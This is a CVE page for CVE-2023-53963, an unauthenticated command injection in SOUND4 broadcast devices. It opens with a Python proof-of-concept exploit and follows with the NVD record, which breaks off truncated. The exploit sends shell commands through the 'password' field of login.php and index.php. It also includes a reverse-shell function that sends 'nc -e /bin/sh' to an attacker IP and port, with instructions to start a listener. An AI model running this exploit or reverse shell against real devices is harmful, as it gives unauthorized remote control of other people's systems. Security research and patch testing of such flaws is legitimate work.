CVE-2023-53963

#!/usr/bin/env python3 """ CVE-2023-53963 PoC - SOUND4 IMPACT/FIRST/PULSE/Eco Unauthenticated RCE Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys def exploit(target_url, command="whoami"): """ Exploit the command injection vulnerability in SOUND4 devices. Args: target_url: Base URL of the target SOUND4 device command: Command to execute on the target system Returns: Response from the target server """ # Target endpoints that are vulnerable endpoints = ["/login.php", "/index.php"] # Payload construction: inject command via password parameter # Using semicolon to chain commands payload = {"password": f"'; {command} #"} for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"[*] Trying endpoint: {url}") try: response = requests.post(url, data=payload, timeout=10, verify=False) # Check if command was executed (response may vary) if response.status_code == 200: print(f"[!] Request sent to {endpoint}") print(f"[*] Payload: {payload['password']}") return response.text except requests.exceptions.RequestException as e: print(f"[-] Error connecting to {endpoint}: {e}") return None def reverse_shell(target_url, attacker_ip, attacker_port): """ Generate a reverse shell payload. Args: target_url: Base URL of the target attacker_ip: Attacker IP address attacker_port: Attacker listening port """ # Netcat reverse shell payload command = f"nc -e /bin/sh {attacker_ip} {attacker_port}" # URL encode the payload payload = {"password": f"'; {command} #"} url = target_url.rstrip('/') + "/login.php" print(f"[*] Sending reverse shell payload to {url}") print(f"[*] Payload: {payload['password']}") print(f"[*] Ensure netcat listener is running: nc -lvnp {attacker_port}") response = requests.post(url, data=payload, timeout=10, verify=False) return response if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 cve-2023-53963.py <target_url> [command]") print("Example: python3 cve-2023-53963.py http://192.168.1.100") print("Example: python3 cve-2023-53963.py http://192.168.1.100 'id'") sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] if len(sys.argv) > 2 else "whoami" print(f"[*] Exploiting CVE-2023-53963 on {target}") print(f"[*] Executing command: {cmd}") result = exploit(target, cmd) if result: print("[+] Exploit sent successfully") else: print("[-] Exploitation failed or target not vulnerable")

{"cve": {"id": "CVE-2023-53963", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:00.693", "lastModified": "2026-01-13T15:42:50.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary shell commands through the 'password' parameter. Attackers can exploit the login.php and index.php scripts by injecting shell commands via the 'password' POST parameter to execute commands with web server privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "33C347FE-DA7B-4137-87B8-E6A8AF4D307F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0A735654-A166-4B56-BF4D-F165B7E11043"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "5C4CF02A-8CF1-46FF-9EC0-FF779D60B6EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC9BD81B-573A-4DA7-AC47-6C8AF1B6B18F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "18E34118-F11B-4BF2-BE23-7DAE0A6790FB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C46BF88C-955C-4F9E-B782-1EADA068F19D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "E0699DEA-9CDA-4BB4-8FA3-6A6FADE1A61E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "051868AE-E364-4CB3-B927-42B4E0C19D01"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "FBDECDEC-C5A2-4B0D-B3E0-58CCCC804BCF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:first:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "4EF10967-A7DC-4DF0-94BE-935FFC1888D6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{" ... (truncated)